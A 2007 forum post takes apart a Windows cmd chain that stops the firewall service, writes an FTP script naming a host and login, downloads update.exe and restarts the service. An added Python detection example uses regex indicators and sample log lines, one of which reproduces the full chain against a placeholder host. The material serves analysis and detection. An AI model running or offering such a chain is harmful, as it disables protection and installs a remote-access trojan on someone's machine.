chucker
 
2007-04-12, 23:49

Let's analyze:
  • cmd (cmd.exe) is the command-line processor in Windows NT (in DOS / Windows 9x, this was command.com), including Windows XP and Vista. The /c argument tells it to run one specific command and then exit (rather than staying open for further user input).
  • net is a facility to manage NT services. stop sharedaccess, then, tells it to stop the service 'sharedaccess'.
  • echo, like on Unix, is a way to print out text. The following commands – open ftp.holmenhast.se 21, user ftp.holmenhast.se f1634163f, binary, get update.exe, bye – are a list of FTP commands.
  • ftp -n -v -s: which are then passed on to the FTP program. The commands log in to an FTP server with a specific user and download a file named update.exe.
  • Finally, net start sharedacc launches the service again.

We can deduce that this update is a replacement service to create a trojan horse, opening a Windows machine for remote access.
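The chain taken apart in the post above (firewall service stopped, an FTP script built with echo, ftp run against that script, service started again) can be recognised in process-creation logs. The following is an added detection example, not part of the original post: the indicator names, the severity levels, the host `ftp.example.invalid`, the `USER`/`PASS` placeholders and all sample command lines are constructed for illustration.

```python
import re

# One pattern per behaviour described in the post, matched against a single
# command of the chain (case-insensitive, as cmd.exe is).
INDICATORS = {
    "firewall_service_stopped": re.compile(r'^net1?(?:\.exe)?\s+stop\s+"?sharedaccess\b', re.I),
    "service_restarted": re.compile(r'^net1?(?:\.exe)?\s+start\s+"?sharedacc', re.I),
    "ftp_script_echoed": re.compile(r"^echo\s+(?:open|user|binary|get|bye)\b", re.I),
    "exe_fetched": re.compile(r"^echo\s+get\s+\S+\.exe\b", re.I),
    "ftp_scripted_run": re.compile(r"^ftp(?:\.exe)?\s+.*-s:", re.I),
}

def split_chain(cmdline):
    """Drop a leading 'cmd /c' and split on &, && and ||.
    Simplification: separators inside quoted strings are not handled."""
    body = re.sub(r"^\s*cmd(?:\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    return [p.strip() for p in re.split(r"\s*(?:&&|\|\||&)\s*", body) if p.strip()]

def classify(cmdline):
    """Return (severity, sorted indicator names) for one logged command line."""
    hits = set()
    for part in split_chain(cmdline):
        hits.update(name for name, rx in INDICATORS.items() if rx.search(part))
    scripted_ftp = {"ftp_script_echoed", "ftp_scripted_run"} <= hits
    fw_down = "firewall_service_stopped" in hits
    if fw_down and scripted_ftp:
        severity = "high"      # the full pattern from the post
    elif fw_down or scripted_ftp:
        severity = "medium"    # half of the pattern: worth a look
    elif hits:
        severity = "low"       # e.g. a scheduled 'ftp -s:' job on its own
    else:
        severity = "none"
    return severity, sorted(hits)

# Constructed sample log entries (placeholders, not values from the post).
SAMPLES = [
    "cmd /c net stop sharedaccess & echo open ftp.example.invalid 21 >> x"
    " & echo user USER PASS >> x & echo binary >> x & echo get update.exe >> x"
    " & echo bye >> x & ftp -n -v -s:x & net start sharedaccess",
    "cmd.exe /c net stop spooler && net start spooler",
    "ftp -s:nightly.txt backup.example.invalid",
    "CMD /C NET STOP SharedAccess",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(classify(line), "<-", line[:60])
```

Matching is done per command after splitting the chain, so a hostname that merely contains "ftp" inside an echo line does not count as an ftp invocation.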